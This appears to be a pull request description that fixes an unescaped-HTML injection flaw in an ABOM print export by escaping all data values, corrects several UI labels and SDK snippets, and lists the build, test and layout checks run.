The ABOM print export wrote server names, URLs, agent names and capability names into a same-origin window with `document.write` and no escaping; a member can register an MCP server whose name carries markup. Every data value now goes through `lib/html-escape.ts` (tested), and the report prints the 0-1 trust score as a percentage. The SDK snippets show the real `attest_mcp` signature, MCP verification is described as policy-conditional, the "unique capabilities" stat is labelled as the tool total it is, the key prefix is no longer labelled a SHA-256 fingerprint, and A2A task states are compared case-insensitively.

## Verification

- `tsc --noEmit` clean, `vitest run` green, `next build` ok on this branch; the branch tip's tree equals #418's tip tree.
- Light and dark at 1440 and 375 px on the MCP pages: no horizontal overflow, no page errors.
